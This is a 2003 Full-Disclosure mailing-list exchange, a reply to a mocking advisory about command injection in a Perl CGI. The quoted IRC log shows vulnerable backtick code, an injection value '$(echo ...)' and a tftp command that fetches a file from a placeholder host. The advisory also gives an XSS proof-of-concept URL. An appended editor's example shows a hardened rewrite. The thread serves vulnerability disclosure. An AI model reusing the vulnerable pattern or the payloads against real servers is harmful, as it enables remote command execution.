Message-ID: <Law11-OE23PJqfFkFKz0004248a@hotmail.com>
From: se_cur_ity at hotmail.com (morning_wood)
Subject: Wood's Infinity Project 3.69a Remote Command Execution

1. that script is only a modification of a previous script, or do you not read the read me?
2. Boinet logger is not mine either, again. I don't get what your point is testing software that isn't mine?
3. My contact with a company that I contacted is part of why I chose to start my open project.

You are trying to discredit me, I see you only making yourself look bad, shame, I thought you of all people here would think twice before making erroneous statements.

wood

----- Original Message -----
From: "badpack3t" <badpack3t@...urity-protocols.com>
To: <full-disclosure@...ts.netsys.com>
Sent: Thursday, June 12, 2003 3:49 PM
Subject: [Full-Disclosure] Wood's Infinity Project 3.69a Remote Command Execution

> This advisory is for "Wood's Infinity Project 3.69a" available at:
> http://exploit.wox.org/thecore/W-infscan-369a.zip
>
> [17:10] * Now talking in #morning_wood
> [17:10] * Topic is ''
> [17:10] * Set by ChanServ on Wed Jun 11 04:19:51
> [17:10] <b0iler> morning_wood knows security well?
> [17:10] <b0iler> I need help.
> [17:11] <b0iler> is this morning_wood?
> [17:15] <{DWL}Vinyl> ya
> [17:15] <{DWL}Vinyl> wassup
> [17:15] <b0iler> you are any good at perl security?
> [17:16] <{DWL}Vinyl> some ya
> [17:16] <b0iler> I need help varifying if this vuln is exploitable.
> [17:16] <{DWL}Vinyl> hey
> [17:16] <{DWL}Vinyl> can you
> [17:16] <{DWL}Vinyl> go to
> [17:17] <{DWL}Vinyl> exploitlabs.com:6667
> [17:17] <{DWL}Vinyl> .#0sec
> [17:17] <{DWL}Vinyl> it my server
>
> [17:17] * Now talking in #0sec
> [17:17] * Topic is 'http://nothackers.org - 0day - Freedom of Voice - Freedom of Choice'
> [17:17] * Set by MrWood on Tue Jun 10 22:13:11
> [17:17] <#0sec> Welcome to 0sec
> [17:18] <b0iler> @values = split(/\&/,$ENV{'QUERY_STRING'});
> [17:18] <b0iler> foreach $i (@values) {
> [17:18] <b0iler> ($varname, $mydata) = split(/=/,$i);
> [17:18] <b0iler> $FORM{$varname} = $mydata;
> [17:18] <b0iler> }
> [17:18] <b0iler> $host = "$FORM{'host'}";
> [17:18] <b0iler> $host =~ tr/+/ /;
> [17:18] <b0iler> $host =~ tr/\%/a/;
> [17:18] <b0iler> $host =~ tr/\;/b/;
> [17:18] <b0iler> $host =~ tr/</c/;
> [17:19] <b0iler> $host =~ tr/>/d/;
> [17:19] <b0iler> $host =~ tr/\|/e/;
> [17:19] <b0iler> $host =~ tr/\&/f/;
> [17:19] <b0iler> $host =~ tr/\^/g/;
> [17:19] <b0iler> $host =~ s/%([a-fA-F0-9][a-fA-F0-9])/pack("C", hex($1))/eg;
> [17:19] <b0iler> $hostname = `$nslookuplocation $host`;
> [17:19] <MrWood> shell code?
> [17:19] <b0iler> ?
> [17:19] <b0iler> .cgi?host=$(echo 'h0n0!')
> [17:19] <MrWood> hehe
> [17:19] <b0iler> that would execute commands on this server.. right?
> [17:20] <MrWood> you want to run this on a remote server?
> [17:20] <b0iler> this is in a .cgi
> [17:20] <MrWood> havin the .pl on it first
> [17:20] <MrWood> ?
> [17:20] <b0iler> I want to find vulnerabilities in this .cgi
> [17:20] <b0iler> I believe this is one.
> [17:20] <MrWood> ahhh
> [17:20] <b0iler> you see.. the programmer of this .cgi is not very knowledgble.
> [17:20] <MrWood> do you have a httpd with perl?
> [17:21] <b0iler> I think they have problems in their code.
> [17:21] <MrWood> if you uploaded the cgi to me
> [17:21] <MrWood> i could let you access it on my box, but i run NT
> [17:22] <MrWood> wtf is $host =~ s/%([a-fA-F0-9][a-fA-F0-9])/pack("C", hex($1))/eg;
> [17:22] <b0iler> that is converting url encoding into ascii
> [17:22] <b0iler> %hexhex into ascii
> [17:22] <MrWood> isint that hex for a serial port?
> [17:23] <b0iler> MrWood: you already have the .cgi.
> [17:23] <MrWood> i do?
> [17:23] <b0iler> it is nph-exploitscanget.cgi
> [17:23] <b0iler> you programmed it.
> [17:23] <MrWood> where?
> [17:23] <MrWood> url?
> [17:23] <b0iler> http://exploit.wox.org/thecore/W-infscan-369a.zip
> [17:24] <MrWood> the worst is'
> [17:24] <MrWood> oon that
> [17:24] <MrWood> there is a call
> [17:24] <MrWood> to local nslookup
> [17:24] <MrWood> if you replace
> [17:24] <MrWood> 'nslookup'
> [17:24] <MrWood> with ummm
> [17:24] <MrWood> lets say
> [17:25] <MrWood> tftp - yourhost.com get file.ext file.ext
> [17:25] <MrWood> it should execute local
> [17:25] <MrWood> :)
> [17:25] <b0iler> what you say makes no sense at all.
> [17:26] <MrWood> if you replace that call
> [17:26] <MrWood> then upload it to remote server
> [17:27] <b0iler> and get... *gasp* cgi privedges on a local server. lol.
> [17:27] <MrWood> it will execute the call you replaced when the script hits that functionm
> [17:27] <MrWood> yes
> [17:27] <b0iler> I will be posting this log to FD list.
> [17:30] <b0iler> your security list is a joke. your website is a joke. your code is a joke.
> [17:30] <MrWood> i have 3 advisorries on hold
> [17:30] * Disconnected (Quit: joke.)
>
> There is a massive xss problem in the 404 script mrwood uses. here is PoC
> for this 0day advisory: http://exploit.wox.org/<b>a</b>
> There is a serious plain text password and default password problem in the
> script available at: http://take.candyfrom.us/bionet-logger1-2.zip
>
> There is also an advisory on 0day (http://nothackers.org) list's use of
> its own "wood-discloser" (some kind of strange full-discloser
> mutation with no vendor notification, no exploit code, flakey
> vulnerabilities, and "0days" which do not compile - they only form
> structures of poorly written English sentences). It claims it releases
> information immediately, but as the log shows mrwood himself is
> withholding vulnerability information from the public. According to mrwood's
> own logic, this is putting 10trillion,billion,million people
> at risk from 0days and attack. Wood-discloser will save us all from
> attack! Praise Ali!
>
> peace out,
>
> ---------------------------
> badpack3t
> founder
> www.security-protocols.com
> ---------------------------
>
>
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.netsys.com/full-disclosure-charter.html
>
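Editor's added example, not part of either message and not code from the project: the `tr///` filter quoted in the log rewrites `%` before the percent-decoding step and never touches `$(...)`, so the value still reaches a shell through the backtick call. The sketch below decodes first, validates `host` against a hostname allowlist, and runs nslookup through a list-form pipe open so no shell parses the value. The sub names and the nslookup path are assumptions.

```perl
#!/usr/bin/perl
use strict;
use warnings;

# Assumed path; the original script keeps it in $nslookuplocation.
my $NSLOOKUP = '/usr/bin/nslookup';

# Decode the value fully before any validation is applied to it.
sub url_decode {
    my ($s) = @_;
    $s =~ tr/+/ /;
    $s =~ s/%([a-fA-F0-9]{2})/chr(hex($1))/eg;
    return $s;
}

# Return the decoded "host" parameter from a query string, or undef.
sub host_param {
    my ($qs) = @_;
    for my $pair (split /&/, $qs) {
        my ($k, $v) = split /=/, $pair, 2;
        return url_decode($v) if defined $k && defined $v && $k eq 'host';
    }
    return;
}

# Allowlist: dot-separated labels of letters, digits and hyphens,
# no label starting or ending with a hyphen, 253 characters at most.
sub valid_host {
    my ($h) = @_;
    return 0 unless defined $h && length($h) <= 253;
    my $label = qr/[A-Za-z0-9](?:[A-Za-z0-9-]{0,61}[A-Za-z0-9])?/;
    return $h =~ /\A${label}(?:\.${label})*\z/ ? 1 : 0;
}

# List-form pipe open runs nslookup directly; no shell ever parses $host.
sub lookup {
    my ($host) = @_;
    open(my $fh, '-|', $NSLOOKUP, $host) or return "lookup failed\n";
    local $/;
    my $out = <$fh>;
    close $fh;
    return defined $out ? $out : '';
}

# Constructed inputs: a plain name, then the value quoted in the log,
# raw and percent-encoded. Only the decision is printed here.
for my $qs ('host=example.com', q{host=$(echo 'h0n0!')},
            'host=%24%28echo+%27h0n0%21%27%29') {
    my $host = host_param($qs);
    printf "%-36s %s\n", $qs, valid_host($host) ? 'accept' : 'reject';
}
```

In the CGI itself, `lookup($host)` would be called only after `valid_host($host)` returns true.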